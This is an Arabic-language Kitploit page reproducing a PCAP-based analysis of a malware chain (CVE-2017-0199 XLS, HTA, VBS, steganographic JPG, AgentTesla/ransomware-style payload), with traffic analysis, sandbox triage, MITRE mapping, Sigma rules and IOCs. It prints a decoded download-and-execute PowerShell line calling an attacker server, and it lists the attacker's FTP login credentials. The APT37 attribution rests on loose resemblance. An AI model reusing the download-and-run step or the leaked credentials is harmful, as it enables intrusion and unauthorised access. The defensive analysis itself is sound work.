Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant — CVE-2017-0199 XLS --> HTA --> VBS --> إخفاء البيانات --> برمجية خبيثة بأسلوب DBATLOADER/GULOADER | Kitploit
أدوات/GitHubGitHub/blackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant
الاستغلالتحليل الشبكة الجنائيإخفاء المعلوماتتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةالقيادة والسيطرةاستخبارات التهديدات
GitHubblackoclock/xls-to-dbatloader-or-guloader-for-agenttesla-variant

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

XLS-to-DBatLoader-or-GuLoader-for-AgentTesla-variant

CVE-2017-0199 XLS --> HTA --> VBS --> إخفاء البيانات --> برمجية خبيثة بأسلوب DBATLOADER/GULOADER

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الملف المحلل

تحليل قائم على PCAP | التاريخ: 2025-03-12 | المؤلف: BlackOclock

جدول المحتويات

1. نظرة عامة على التحليل

  • 1.1 الملف المحلل (PCAP فقط)
  • 1.2 الجدول الزمني للإصابة ورسم خريطة CVE

2. تحليل حركة المرور الشبكية

  • 2.1 التسلسل الهرمي للبروتوكولات – الصورة الكبيرة
  • 2.2 المحادثات – أعلى المتحدثين ونقل البيانات
  • 2.3 نقاط النهاية – تأكيد الإرسال/الاستقبال
  • 2.4 كائنات تصدير HTTP – الملفات المستخرجة
  • 2.5 عامل تصفية HTTP Contains – فحص الإخفاء (Steganography)

3. تحليل NetworkMiner

  • 3.1 نظرة عامة على الملفات المستخرجة
  • 3.2 تفاصيل الملفات (HTA, VBS, TXT)
  • 3.3 بصمات JA3 / JA3S / JA4

4. تحليل سجلات Zeek (ZUI)

  • 4.1 تأكيد استخراج الملفات
  • 4.2 تجزئات MD5/SHA1 والطوابع الزمنية
  • 4.3 التكامل مع VirusTotal

5. الملفات المستخرجة والتحليل الثابت

6. الفرز والتحليل السلوكي

  • 6.1 فرز HTA – تنفيذ mshta.exe
  • 6.2 فرز VBS – WScript.exe وPowerShell
  • 6.3 فرز TXT – Notepad.exe وسلوك برامج الفدية

7. تحليل حقن العمليات

  • 7.1 شجرة العمليات – mshta → cmd → powershell → csc → Notepad
  • 7.2 أحداث WriteProcessMemory
  • 7.3 التلاعب بالرموز (SeDebugPrivilege)

8. تحليل تفريغ الذاكرة

  • 8.1 تفريغات ذاكرة PowerShell (HTA) (PID 4424)
  • 8.2 تفريغ ذاكرة comonstraints.vbs (PID 1184)

9. كشف C2 وبصماته

  • 9.1 تحليل Jarm / JA4
  • 9.2 التنقل عبر GreyNoise وShodan ورسم خرائط بنية C2

10. تحليل تسرب البيانات

  • 10.1 حركة مرور FTP – 89.39.83.184
  • 10.2 بيانات الاعتماد المسروقة وقوائم الاتصال

11. سلوك برامج الفدية

  • 11.1 تنفيذ foeMMBIG.txt
  • 11.2 Notepad.exe كهدف للحقن

12. الاستخبارات التهديدية

  • 12.1 نتائج VirusTotal وMalwareBazaar
  • 12.2 رسم خريطة MITRE ATT&CK
  • 12.3 الارتباط بـ APT37 (ScarCruft)

13. هندسة الكشف

  • 13.1 قواعد Sigma

14. الخاتمة ومؤشرات الاختراق

  • 14.1 ملخص سلسلة الهجوم الكاملة

  • 14.2 مؤشرات الاختراق (عناوين IP، التجزئات، النطاقات)

  • 14.3 التوصيات

    root@kitploit:~
                                         ملاحظة!!! في هذا التحليل، تم استخدام ملف PCAP 'فقط'! لم تكن ملفات ZIP مطلوبة؛
    

##1. نظرة عامة على التحليل

ملفات المصدر من Malware-Traffic-Analysis.net

الشكل 1: ملفات المصدر التي تم تنزيلها في malware-traffic-analysis.net - تم استخدام ملف PCAP 'فقط' \

2025-01-09 (الخميس): CVE-2017-0199 XLS --> HTA --> VBS --> إخفاء المعلومات (Steganography) --> برمجيات خبيثة من نمط DBATLOADER/GULOADER

##2. تحليل حركة المرور الشبكية

2.1-التسلسل الهرمي للبروتوكولات – الصورة الكبيرة

التسلسل الهرمي للبروتوكولات

بدأت بالتسلسل الهرمي للبروتوكولات للحصول على نظرة شاملة لحركة المرور. يوضح هذا حجم كل بروتوكول مستخدم. كما يظهر في الشكل، يمثل TLS 82.4% من إجمالي حركة المرور. بالإضافة إلى ذلك، توجد بيانات Media Line و Line-Based أيضًا. ومع ذلك، لفهم نشاط الشبكة بشكل أفضل، نحتاج إلى فحص المحادثات ونقاط النهاية.

2.2-المحادثات – أعلى المتحدثين ونقل البيانات

المحادثات

نستخدم المحادثات للكشف عن أزواج عناوين IP التي لديها أكبر كمية نقل بيانات بينها. يُظهر التحليل أن 10.9.1.101 (المضيف) و 104.17.201.1 لديهما أعلى حجم حركة مرور. تم استخدام المنافذ 80 و 443 لنقل البيانات هذه. بالإضافة إلى ذلك، نرى أنه تم نقل 3 ميغابايت من البيانات إلى 10.9.1.101 (المضيف) من 104.17.201.1. نتيجة حاسمة أخرى هي الاتصال على المنفذ 21 بسبب الاتصال من عنوان IP الخاص بشبكة WAN (89.39.83.184)، مما يشير إلى احتمال تسرب البيانات. لكننا لسنا متأكدين الآن، لأننا لا نعرف عنه بعد. نحتاج دليلاً!

2.3- نقاط النهاية

نقاط النهاية

نستخدم نقاط النهاية لتحديد أعلى المتحدثين على الشبكة. 104.17.201.1 لديه 3 ميغابايت من البيانات المرسلة (Tx) وأيضًا 10.9.1.101 لديه 3 ميغابايت من البيانات المستلمة (Rx). بالإضافة إلى ذلك، أعلى المتحدثين هم 104.17.201.1 كمصدر و 10.9.1.101 كوجهة.

2.4- كائنات تصدير HTTP

تصدير

يُستخدم التصدير لتحديد الملفات والبيانات ورسائل البريد الإلكتروني وما إلى ذلك المنقولة عبر الشبكة. في كل مرة نحلل فيها pcap، يجب علينا التحقق هنا لمعرفة الحزم التي تحتوي على أي بيانات. حسنًا، لاحظنا الحزم 88,132,2457 و 2468.

2.5- عامل تصفية HTTP Contains

تصدير

إذا كانت هناك بروتوكولات HTTP على الشبكة. يجب علينا التحقق من png, zip, jpg, jpeg (الإخفاء) كوسائط في عامل التصفية، لأن المهاجمين غالبًا ما يستخدمون أكوادًا خبيثة في ملفات الوسائط لتجاوز اكتشاف برامج مكافحة الفيروسات.

#مثال: http contains ".png" أو http contains ".jpg" أو http contains ".jpeg" أو http contains ".zip"

نحن نرى فقط لماذا هذا الفلتر مهم عندما يتم استخدام المنفذ 80 على الشبكة. هنا يوجد ملف .hta تم إرساله عبر ملفات الوسائط في الحزمة 47. ولكن عند استخدام التصدير لتحديد الملفات، لم يكن موجودًا.

##3. تحليل NetworkMiner

  • 3.1 تفاصيل الملفات (HTA, VBS, TXT)

NetworkMiner

يمكننا استخدام networkminer لتحديد الملفات بشكل أسرع على PCAP. إذا كنت تستخدم REMnux أو نظام Linux، يمكنك كتابة الأمر في الطرفية ( networkminer pcap_name )

الإطار = 47 | اسم الملف = seemebestthingsevermeetgivenbestthingsfornewways | الامتداد = .hta | الحجم = 47 كيلوبايت | عنوان IP المصدر = 192.3.27.144 الإطار = 132 | اسم الملف = comonstraints | الامتداد = .vbs | الحجم = 223 كيلوبايت | عنوان IP المصدر = 107.172.31.5 الإطار = 2457 | اسم الملف = foeMMBIG | الامتداد = .txt | الحجم = 325 كيلوبايت | عنوان IP المصدر = 107.172.31.5

  • 3.2 بصمات JA3 / JA3S / JA4

بصمات NetworkMiner JA4/JA3

تجزئات JA3:

  • 06843d66057fc9cbe42e9d690308903 (الإطار 8)
  • 62136a81b5b727d039d8160d188863aa (الإطار 14)
  • 3c4eb72b882d4d1442c67ce73f1292a9 (الإطار 140)

بصمات JA4:

  • t13d1516h2_8daaf6152771_02713d6af862
  • t13d201000_2b729b4bf63_29829a46703f

حسنًا، لكن لماذا نحتاج إلى تجزئات JA4 و JA3؟ قد يكون هناك سؤال: ما هما JA3 و JA4؟

دعني أشرح؛ JA3 و JA4 هما تقنيات تستخدم لبصمة عملاء وخوادم TLS بناءً على معايير المصافحة TLS. يقوم JA3 بإنشاء تجزئة MD5 لحزمة client hello لمصافحة TLS، مما يحدد بشكل فريد تطبيق العميل (مثل المتصفح، البرمجية الخبيثة).

JA4 هي تقنية أحدث. إنها مثل بصمة لحركة مرور الإنترنت. تمامًا كما يمتلك البشر بصمات أصابع فريدة، يترك كل برنامج يتصل بالإنترنت بصمة فريدة. مفيدة جدًا للعثور على خادم C2.

##4. تحليل سجلات Zeek (ZUI)

  • 4.1 تأكيد استخراج الملفات، تجزئات MD5/SHA1 والطوابع الزمنية، التكامل مع VirusTotal

تم استخدام سجلات Zeek للتحقق من الملفات المستخرجة من حركة مرور HTTP. يُظهر files.log الإدخالات التالية:

تم استخدام هذه التجزئات لاحقًا لعمليات البحث في VirusTotal.

نتيجة hta

Hta (seemebestthing…)

MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

نتيجة vbs

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

نتيجة foeMMBIG

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

##5. الملفات المستخرجة والتحليل الثابت

هنا سنقوم بتصدير جميع الملفات من pcap على سطح المكتب وسنقوم بتحليلها باستخدام binwalk

نتيجة foeMMBIG

ملف HTA يبدو نظيفًا. لم أتمكن من العثور على أي بيانات مخفية. يبدو كملف نصي عادي.

ملف VBS مختلف. وجدت شيئين بداخله:

بعض بيانات Base64 ومستند HTML هذا يعني أن ملف VBS له طبقات متعددة. حاول المهاجم إخفاء الكود بداخله.

ملف TXT أعطاني مخرجات غريبة. تقول "رأس Broadcom"، وهو ما لا معنى له لملف نصي. ربما الملف تالف، أو هناك طبقة أخرى بداخله. أحتاج إلى تشغيله في بيئة اختبار معزولة (sandbox) لفهم المزيد

##6. الفرز والتحليل السلوكي

  • 6.1 فرز HTA – تنفيذ mshta.exe

قمت بتشغيل ملف HTA في بيئة اختبار معزولة. إليك ما حدث:

فرز HTA

لدينا نتيجة hta. النتيجة 8/10 بواسطة Triage.

فرز HTA

سلسلة العمليات بـ 5 خطوات: mshta.exe (PID 1080) بدأ ثم شغل cmd.exe (4952) ثم شغل cmd.exe powershell.exe (4424) قام PowerShell بتمكين SeDebugPrivilege (للوصول إلى عمليات أخرى) تم استخدام WriteProcessMemory عدة مرات لحقن الكود

سلسلة الحقن:

mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → عملية غير معروفة (3332)

قام PowerShell أيضًا بفحص العمليات الجارية (اكتشاف) والنظر في لغة النظام (ربما لتجنب بيئات الاختبار المعزولة).

تقنيات MITRE التي رأيتها لـ hta :

T1059.001 (PowerShell) T1059.003 (cmd) T1057 (اكتشاف العمليات) T1134 (التلاعب بالرموز) T1055 (حقن العمليات) T1614.001 (كشف اللغة)

فرز HTA

حسنًا، نرى هنا FromString64Base في أمر PowerShell بواسطة cmd.exe. علينا فك تشفيره على CyberChef لرؤية الكود في base64.

فرز HTA

في أمر PowerShell، وجدت سلسلة Base64. بعد فك تشفيرها باستخدام CyberChef، رأيت هذا:

URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."

هذا يعني أنه من 107.172.31.5 يتم تنزيل comonstraints.vbs ثم الانتظار 3 ثوانٍ ثم تشغيله. حسنًا، في الخطوة التالية سيتم تنزيل comonstraints.vbs.

  • 6.2 فرز VBS – WScript.exe وPowerShell

فرز VBS

لدينا نتيجة vbs. النتيجة 10/10 بواسطة Triage.

سلسلة العمليات: تم تشغيل Wscript.exe وقام بتشغيل PowerShell.exe

حسنًا، في الصورة إذا تحققنا من الأكواد في العملية. يمكننا مشاهدة #x#.GIBMMeof/5.13.271.701//:p##h ----> يوجد مسار مشفر . http://107.172.31.5/foeMMBIG.txt (الذي ظهر في تصدير PCAP)

وأيضًا هذا الموقع https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg، والذي يحتوي على كود خبيث داخل jpg. يحتوي JPG على علامات <BASE64_START> و <BASE64_END>. بينهما، مما يعني أن هناك كودًا مخفيًا. النص المخفي هو في الواقع Base64 ولكن مكتوب بشكل معكوس. يقوم النص البرمجي أولاً بعكس النص ثم فك تشفيره. بعد فك التشفير، يصبح برنامجًا صغيرًا (تجميعة .NET) ويتم تشغيله على الكمبيوتر.

حاولت تنزيل jpg.

فرز VBS

لكن لم أتمكن من الحصول عليه. ربما تم إغلاق هذا العنوان. يقوم ملف VBS بتنزيل صورة، ويجد كودًا مخفيًا بداخلها، ويصلحه، ويشغله. هذا يسمى الإخفاء (Steganography) – إخفاء الأشياء داخل الصور.

تقنيات MITRE:

T1012 - استعلام التسجيل T1082 - اكتشاف معلومات النظام T1055 - حقن العمليات T1057 – اكتشاف العمليات T1134 – التلاعب برموز الوصول

  • 6.3 فرز TXT – Notepad.exe وسلوك برامج الفدية

فرز txt

  • تم فتح الملف باستخدام Notepad.exe (PID 4600)
  • ثم قام Notepad بحقن الكود في نفسه (حقن العمليات)
  • بدأت الملفات على سطح المكتب في التشفير
  • ظهرت رسالة فدية كملف txt

هذا يؤكد أن foeMMBIG.txt هو في الواقع أداة تنزيل برامج فدية.

تقنيات MITRE:

  • T1055 (حقن العمليات)

##7. تحليل حقن العمليات

7.1 شجرة العمليات

mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)

7.2 أحداث WriteProcessMemory

كتب PID 1080 (mshta.exe) إلى PID 4952 (cmd.exe) كتب PID 4952 (cmd.exe) إلى PID 4424 (powershell.exe) كتب PID 4424 (powershell.exe) إلى PID 4432 (csc.exe) كتب PID 4432 (csc.exe) إلى PID 3332 (غير معروف)

7.3 التلاعب بالرموز

قام PowerShell (PID 4424) بتمكين SeDebugPrivilege، مما سمح له بالوصول إلى عمليات أخرى.

##8. تحليل تفريغ الذاكرة

  • 8.1 تفريغات ذاكرة PowerShell (HTA) (PID 4424)

عند تشغيل البرمجية الخبيثة، أخذت بيئة الاختبار المعزولة لقطات ذاكرة لـ PowerShell (PID 4424). تحفظ هذه اللقطات ما كان في ذاكرة الوصول العشوائي (RAM) في تلك اللحظة.

وجدت أكثر من 20 ملف تفريغ ذاكرة

ذاكرة hta

  • 8.2 تفريغ ذاكرة comonstraints.vbs (PID 1184)

ملف VBS (الذي تم تشغيله بواسطة WScript.exe، PID 1184) أنشأ أيضًا تفريغات ذاكرة. هذه التفريغات يبلغ حجمها 64 كيلوبايت في الغالب. هذا طبيعي للتخصيصات الصغيرة. لكنني تحققت من وجود تفريغات ذاكرة لـ Notepad.exe (PID 4600)، لكن لم يكن هناك أي منها. هذا مثير للاهتمام لأننا نعلم أن Notepad تم استخدامه لفتح foeMMBIG.txt.

##9. كشف C2 وبصماته

  • 9.1 تحليل Jarm / JA4

jarm

تم طباعة Jarm فقط من عنواني IP

  • 9.2 التنقل عبر GreyNoise وShodan ورسم خرائط بنية C2

استخرجت بصمات JA4 من NetworkMiner وبحثت عنها في GreyNoise. وجدت 26 عنوان IP تم الإبلاغ عنها كخبيثة بنفس بصمة JA4. ثم بحثت عن جميع عناوين IP هذه في Shodan لفحص منافذها وخدماتها المفتوحة.

تم إنشاء هذه القائمة عن طريق فحص GreyNoise، وهذه العناوين IP تم الإبلاغ عنها كخبيثة في GreyNoise:

  • 34.122.147.229 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 7 أشهر شارك عنوان IP هذا في 1222 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1177)، تسجيل دخول Fortinet (45). أول ظهور: 2024-05-07 23:10 UTC، آخر ظهور: 2025-07-17 17:28 UTC. 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث. Not After: 2020-11-30 22:10:40 )

  • 107.189.1.175 - نتيجة Shodan C: لوكسمبورج المؤسسة: Buy VM المنافذ المفتوحة: 80 / 443 / 9001 / 9030

  • 104.197.69.115 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 5 أشهر شارك عنوان IP هذا في 1159 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1124)، تسجيل دخول Fortinet (35). أول ظهور: 2024-07-11 04:26 UTC، آخر ظهور: 2025-09-25 12:08 UTC. 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث )

  • 34.72.176.129 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 5 أشهر شارك عنوان IP هذا في 1233 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1201)، تسجيل دخول Fortinet (32). أول ظهور: 2024-07-11 04:26 UTC، آخر ظهور: 2025-09-25 12:12 UTC. ابحث عن مزيد من المعلومات على CrowdSec CTI - وفقًا لمصدر CrowdSec - منذ سنة واحدة السلوكيات: محاولة استغلال / هجوم القوة الغاشمة HTTP / زحف HTTP + 2 إضافية. التفاصيل الكاملة على CrowdSec CTI
    6/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث

  • 34.123.170.104 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ شهر واحد شارك عنوان IP هذا في 1141 حدثًا عبر 3 أنواع متميزة من الهجمات. الهجمات: فحص منفذ TCP (1097)، تسجيل دخول Fortinet (42)، تسجيل دخول ويب (2). أول ظهور: 2024-05-23 14:07 UTC، آخر ظهور: 2026-01-26 05:22 UTC. ابحث عن مزيد من المعلومات على CrowdSec CTI - وفقًا لمصدر CrowdSec - منذ سنة واحدة السلوكيات: زحف HTTP / رفض الخدمة HTTP / استغلال HTTP + 1 إضافية. التفاصيل الكاملة على CrowdSec CTI ) 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث

  • 121.127.42.69 ( 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث)

  • 185.220.101.2 نتيجة Shodan ( أسماء المضيفين: berlin01.tor-exit.artikel10.org الدولة: ألمانيا المؤسسة: Artikel10 e.V. مزود خدمة الإنترنت: Stiftung Erneuerbare Freiheit (إنه TOR) المنافذ: 80/443/9001/9002

  • 185.220.101.162 ( أسماء المضيفين: tor-exit-162.relayon.org الدولة: ألمانيا / المؤسسة: CIA TRIAD SECURITY LLC مزود خدمة الإنترنت: Stiftung Erneuerbare Freiheit)

  • 205.169.39.24 فحص المنافذ الشبكية والاستطلاع - وفقًا لمصدر Guardpot - منذ 8 أشهر شارك عنوان IP هذا في 86 حدثًا عبر نوع هجوم واحد. الهجمات: فحص منفذ TCP (86). أول ظهور: 2024-08-22 22:29 UTC، آخر ظهور: 2025-07-04 17:29 UTC.

  • 47.254.76.66 ( موفر السحابة: Alibaba Cloud الدولة: الولايات المتحدة المنافذ المفتوحة: 22 نظام التشغيل: Linux

  • 47.251.118.89 (موفر السحابة: Alibaba Cloud الدولة: الولايات المتحدة المنافذ المفتوحة: 22 نظام التشغيل: Linux)

##10. تحليل تسرب البيانات

  • 10.1 حركة مرور FTP – 89.39.83.184

عند التحقق من 89.39.83.184، نرى أن هذا ip يتصل على المنفذ 21 مع المضيف. إذا نقرنا على إحدى الحزم على 21 ftp و Follow --- > TCP STREAM، نرى البريد الإلكتروني وكلمة المرور للمهاجم

معلومات المهاجم

  • 10.2 بيانات الاعتماد المسروقة وقوائم الاتصال

عند التحقق من الملفات في networkminer، كان هناك أرقام حزم 2498 (PW_user1_DESKTOP.html) و 2516 (Contacts_Thunder.txt). بعد تصدير تلك الملفات، توجد معلومات اسم المستخدم وكلمة المرور لهجوم التصيد (أعتقد) أو سرقة الحسابات.

معلومات المهاجم

قمت بالبحث عن عنوان IP لخادم FTP (89.39.83.184) على Shodan لمعرفة المزيد عن بنية المهاجم.

معلومات المهاجم

##12. الاستخبارات التهديدية

12.1 نتائج VirusTotal وMalwareBazaar

تم فحص التجزئات التي تم الحصول عليها من سجلات Zeek (القسم 4) على VirusTotal وMalwareBazaar. تم تأكيد أن جميع الملفات خبيثة:

ملف HTA: اكتشاف بنسبة 33/61، تم التعرف عليه كـ AgentTesla ملف VBS: اكتشاف بنسبة 31/62، تم التعرف عليه كـ AgentTesla / Talu ملف TXT: اكتشاف بنسبة 25/62، تم التعرف عليه كـ Zapchast / Bhgd (أداة تنزيل برامج فدية)

انظر القسم 14.2 للحصول على قائمة التجزئات الكاملة.

12.2 رسم خريطة MITRE ATT&CK

T1059.001 - PowerShell T1059.003 - cmd T1134 - التلاعب بالرموز T1614.001 - كشف اللغة T1012 - استعلام التسجيل T1082 - اكتشاف معلومات النظام T1055 - حقن العمليات T1057 – اكتشاف العمليات

12.3 الارتباط بـ APT37 (ScarCruft)

لماذا يبدو هذا الهجوم مثل APT37؟

ما رأيناه في هذا الهجوم - يشتهر APT37 به تم استخدام ملف HTA لبدء العدوى - يستخدم APT37 ملفات HTA كثيرًا PowerShell مع أوامر base64 - يحب APT37 PowerShell الإخفاء (JPG مع كود مخفي) - يخفي APT37 الكود في الصور حقن العمليات (mshta → cmd → powershell → csc) - يحقن APT37 الكود في العمليات الموثوقة تسريب FTP للبيانات المسروقة - يسرق APT37 بيانات الاعتماد والملفات برامج فدية في النهاية - يستخدم APT37 الآن أيضًا برامج فدية الأهداف ربما في أوروبا - ينشط APT37 في أوروبا الاستنتاج تتطابق التقنيات التي رأيناها في هذا الهجوم مع ما يفعله APT37 عادةً. إنه ليس دليلاً بنسبة 100%، لكنه يبدو مثل APT37. من المحتمل أن تكون مجموعة قرصنة كورية شمالية وراء ذلك.

##13. هندسة الكشف

  • 13.1 قواعد Sigma

title: SeDebugPrivilege في PowerShell description: يكتشف PowerShell الذي يمكّن SeDebugPrivilege (احتمال التلاعب بالرموز) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection

title: تسريب FTP description: يكتشف اتصالات FTP من عمليات لا ينبغي لها استخدام FTP logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: PowerShell Download description: يكتشف PowerShell وهو يقوم بتنزيل الملفات من الإنترنت logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection

title: Notepad من Temp description: يكتشف فتح المفكرة لملفات من مجلد Temp (احتمال حقن عملية) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection

ملاحظة! أعلم أن هذا أساسي ولكني أحاول تعلم قواعد سيغما.

##14. الخلاصة ومؤشرات الاختراق (IOCs)

14.1 ملخص سلسلة الهجوم الكاملة

بدأت الإصابة بملف HTA ضار تم تنزيله من 192.3.27.144. عند فتحه، أطلق سلسلة من العمليات:

mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe

النتائج الرئيسية:

  • قام PowerShell بتمكين SeDebugPrivilege واستخدم WriteProcessMemory لحقن الكود قام ملف VBS بتنزيل صورة JPG من Cloudinary. احتوت صورة JPG على بيانات Base64 مخفية بين علامتي <BASE64_START> و <BASE64_END>. استخرج السكربت هذه البيانات، عكسها، وفك تشفيرها إلى تجميع .NET. تم تحميل هذا التجميع في الذاكرة وتنفيذه. على الرغم من أننا لم نتمكن من تنزيل JPG (خطأ 401)، إلا أن الكود يشير بقوة إلى أن هذه هي الآلية التي قامت بتنزيل الحمولة النهائية (foeMMBIG.txt).

جهة التهديد: APT37 – التقنيات تطابق TTPs المعروفة

14.2 مؤشرات الاختراق

عناوين IP:

IP = 107.172.31.5 | الدور = خادم C2 (تنزيل VBS، TXT) IP = 89.39.83.184 | الدور = خادم تسريب FTP IP = 192.3.27.144 | الدور = مصدر تنزيل HTA IP = 104.17.201.1 | الدور = تنزيل المرحلة الأولى (3 ميجابايت) 25 عنوان IP ضار من GreyNoise | انظر القائمة الكاملة في القسم 9.2

النطاقات:

النطاق = res.cloudinary.com الدور = إخفاء المعلومات (JPG مع كود مخفي) النطاق = ip-api.com اسم الملف = index.B23BDC8E.txt(false) الدور = التحقق من التهرب من بيئة الاختبار

تجزئات الملفات:

(seemebestthing…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

بيانات اعتماد FTP:

  • اسم المستخدم: [email protected]
  • كلمة المرور: e)rwKbkKP8-m0

14.3 التوصيات

  • قم بحظر جميع عناوين IP والنطاقات المدرجة في قسم IOCs
  • راقب بصمات JA3/JA4 لاكتشاف بنية تحتية مشابهة لـ C2
  • استخدم قواعد سيغما (انظر القسم 13) في نظام SIEM الخاص بك
  • درّب المستخدمين على هجمات التصيد التي توزع ملفات HTA
  • فعّل تسجيل PowerShell وراقب استخدام SeDebugPrivilege
  • اعزل وحقق في أي مضيف به أنماط مشابهة لحقن العمليات
تنزيل الأداة
  • 107.189.12.7( أسماء المضيفين: tor.privatebrowsing.org الدولة: لوكسمبورج المنافذ المفتوحة: 80)

  • 47.88.18.245 ( الدولة: الولايات المتحدة نظام التشغيل: Linux المنفذ المفتوح: 22)

  • 79.127.248.2 ( 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث الدولة: الولايات المتحدة)

  • 185.126.82.201( الدولة: الولايات المتحدة المنفذ: 1080)

  • 45.92.19.139 (الدولة: الولايات المتحدة المنفذ: 59511)

  • 47.251.186.126( الدولة: الولايات المتحدة المنفذ: 22)

  • 79.127.221.66 (الدولة: الولايات المتحدة المنفذ: 1080)

  • 185.241.208.136 ( الدولة: بولندا أسماء المضيفين: ns2.rdp.rs المنافذ المفتوحة: 111/8440/9001)

  • 47.89.246.29 ( الدولة: الولايات المتحدة المنفذ: 22)

  • 185.220.101.110 ( أسماء المضيفين: tor-exit-110.digitalcourage.de المنافذ المفتوحة: 80/123/443/8080)

  • 5.77.252.202 ( أسماء المضيفين: host-202.252.77.5.ucom.am الدولة: أرمينيا المنافذ المفتوحة: 1701/8291)

  • 124.198.132.172(Tor) ( الدولة: الولايات المتحدة المنافذ المفتوحة: 111/8110/9001)

  • 185.220.101.9 (Tor) ( اسم المضيف: berlin01.tor-exit.artikel10.org الدولة: بولندا المنافذ المفتوحة: 80/443/9001/9002)

  • 213.230.93.13 ( 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث الدولة: أوزبكستان)

  • 138.199.140.203 ( اسم المضيف: static.203.140.199.138.clients.your-server.de الدولة: ألمانيا المنافذ المفتوحة: 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)